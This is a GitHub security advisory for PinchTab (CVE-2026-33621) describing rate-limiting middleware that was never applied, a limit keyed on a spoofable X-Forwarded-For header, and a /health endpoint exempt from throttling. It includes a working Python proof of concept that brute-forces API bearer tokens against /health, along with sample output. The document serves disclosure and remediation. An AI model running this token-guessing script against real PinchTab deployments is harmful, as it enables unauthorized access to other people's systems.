"details": "### Summary\nPinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle.\n\nIn the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured.\n\nThis issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup.\n\nPinchTab\u0027s default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug.\n\nThis was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well.\n\n### Details\n**Issue 1 \u2014 Middleware never applied in `v0.7.7` through `v0.8.3`:**\nThe production server wrapped the HTTP mux without `RateLimitMiddleware`:\n\n```\n// internal/server/server.go \u2014 v0.8.3\nhandlers.LoggingMiddleware(\n handlers.CorsMiddleware(\n handlers.AuthMiddleware(cfg, mux),\n // RateLimitMiddleware is not present here in v0.8.3\n ),\n)\n```\n\nThe function exists and is fully implemented:\n\n```\n// internal/handlers/middleware.go \u2014 v0.8.3\nfunc RateLimitMiddleware(next http.Handler) http.Handler {\n startRateLimiterJanitor(rateLimitWindow, evictionInterval)\n return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n // ... 120 req / 10s logic ...\n })\n}\n```\n\nBecause `RateLimitMiddleware` was never referenced from the production handler chain in `v0.7.7` through `v0.8.3`, the intended request throttling was inactive in those releases.\n\n**Issue 2 \u2014 `X-Forwarded-For` trust in the original limiter (`v0.7.7` through `v0.8.3`):**\nEven if the middleware had been applied, the original IP identification was bypassable:\n\n```\n// internal/handlers/middleware.go \u2014 v0.8.3\nhost, _, _ := net.SplitHostPort(r.RemoteAddr) // real IP\nif xff := r.Header.Get(\"X-Forwarded-For\"); xff != \"\" {\n // No validation that request came from a trusted proxy\n // Client can set this header to any value\n host = strings.TrimSpace(strings.Split(xff, \",\")[0])\n}\n// host is now client-influenced \u2014 rate limit key is spoofable\n```\n\nIn `v0.7.7` through `v0.8.3`, if the limiter had been enabled, a client could have influenced the rate-limit key through `X-Forwarded-For`. This made the original limiter unsuitable without an explicit trusted-proxy model.\n\n**Issue 3 \u2014 `/health` and `/metrics` remained exempt through `v0.8.4`:**\n`v0.8.4` wired the limiter into production and switched to the immediate peer IP, but it still bypassed throttling for `/health` and `/metrics`:\n\n```\n// internal/handlers/middleware.go \u2014 v0.8.4\nfunc RateLimitMiddleware(next http.Handler) http.Handler {\n startRateLimiterJanitor(rateLimitWindow, evictionInterval)\n return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n p := strings.TrimSpace(r.URL.Path)\n if p == \"/health\" || p == \"/metrics\" || strings.HasPrefix(p, \"/health/\") || strings.HasPrefix(p, \"/metrics/\") {\n next.ServeHTTP(w, r)\n return\n }\n host := authn.ClientIP(r)\n // ...\n })\n}\n```\n\nThat left `GET /health` unthrottled even though it remained an auth-checkable endpoint when a server token was configured, so online guessing against that route still saw no rate-limit response through `v0.8.4`.\n\n### PoC\nThis PoC assumes the server is reachable by the attacker and that the configured API token is weak and guessable, for example `password`.\n\n**PoC Code**\n```\n#!/usr/bin/env python3\n# brute_force_poc.py \u2014 demonstrates unthrottled token guessing on /health\nimport urllib.request, urllib.error, time, sys\n\nTARGET = \"http://localhost:9867/health\"\nWORDLIST = [f\"wrong-{i:03d}\" for i in range(150)] + [\"password\"]\ncounts = {}\n\nprint(f\"[*] Brute-forcing {TARGET} \u2014 no rate limit protection\")\nstart = time.time()\nfor token in WORDLIST:\n req = urllib.request.Request(TARGET)\n req.add_header(\"Authorization\", f\"Bearer {token}\")\n try:\n with urllib.request.urlopen(req, timeout=5) as r:\n print(f\"[+] FOUND: token={token!r} HTTP={r.status}\")\n counts[r.status] = counts.get(r.status, 0) + 1\n sys.exit(0)\n except urllib.error.HTTPError as e:\n print(f\"[-] token={token!r} HTTP={e.code}\")\n counts[e.code] = counts.get(e.code, 0) + 1\n\nelapsed = time.time() - start\nprint(f\"[*] {len(WORDLIST)} attempts in {elapsed:.2f}s \u2014 \"\n f\"{len(WORDLIST)/elapsed:.0f} req/s (no 429 received)\")\nprint(f\"[*] status counts: {counts}\")\n```\n\nAfter run\n```\npython3 ratelimit.py\n[*] Brute-forcing http://localhost:9867/health \u2014 no rate limit protection\n[-] token=\u0027wrong-000\u0027 HTTP=401\n...\n[-] token=\u0027wrong-149\u0027 HTTP=401\n[+] FOUND: token=\u0027password\u0027 HTTP=200\n[*] 151 attempts in 0.84s \u2014 180 req/s (no 429 received)\n[*] status counts: {401: 150, 200: 1}\n```\n\n**Observation:**\n1. In `v0.7.7` through `v0.8.3`, rapid requests do not return HTTP 429 because `RateLimitMiddleware` is not active in production.\n2. In `v0.8.4`, the same `/health` PoC still does not return HTTP 429 because `/health` is explicitly exempted from rate limiting.\n3. The PoC succeeds only when the configured token is weak and appears in the tested candidates.\n4. The original `X-Forwarded-For` behavior in `v0.7.7` through `v0.8.3` shows that the first limiter design would not have been safe to rely on behind untrusted clients.\n5. This PoC does not demonstrate token disclosure or authentication bypass independent of token guessability.\n\n### Impact\n1. Reduced resistance to online guessing of weak or reused API tokens in deployments where an attacker can reach the API.\n2. Loss of the intended per-IP throttling for burst requests against protected endpoints in `v0.7.7` through `v0.8.3`, and against `/health` in `v0.8.4`.\n3. Higher abuse potential for intentionally exposed deployments than intended by the middleware design.\n4. This issue does not by itself disclose the token, bypass authentication, or make all deployments equally affected. Installations using the default local-first posture and generated high-entropy tokens have substantially lower practical risk.\n\n### Suggested Remediation\n1. Apply `RateLimitMiddleware` in the production handler chain for authenticated routes.\n2. Derive the rate-limit key from the immediate peer IP by default instead of trusting client-supplied forwarded headers.\n3. Do not exempt auth-checkable endpoints such as `/health` and `/metrics` from rate limiting.\n4. Consider an additional auth-failure throttle so repeated invalid token attempts are constrained even when endpoint-level behavior changes in the future.\n\n**Screenshot capture**\n\u003cimg width=\"553\" height=\"105\" alt=\"\u0e20\u0e32\u0e1e\u0e16\u0e48\u0e32\u0e22\u0e2b\u0e19\u0e49\u0e32\u0e08\u0e2d 2569-03-18 \u0e40\u0e27\u0e25\u0e32 13 03 01\" src=\"https://github.com/user-attachments/assets/ab5cd7af-5a67-40ae-aae3-1f4737afd32e\" /\u003e",
"id": "GHSA-j65m-hv65-r264",
"modified": "2026-03-27T21:19:20Z",
"published": "2026-03-24T19:47:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33621"
},
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b"
},
{
"type": "PACKAGE",
"url": "https://github.com/pinchtab/pinchtab"
},
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…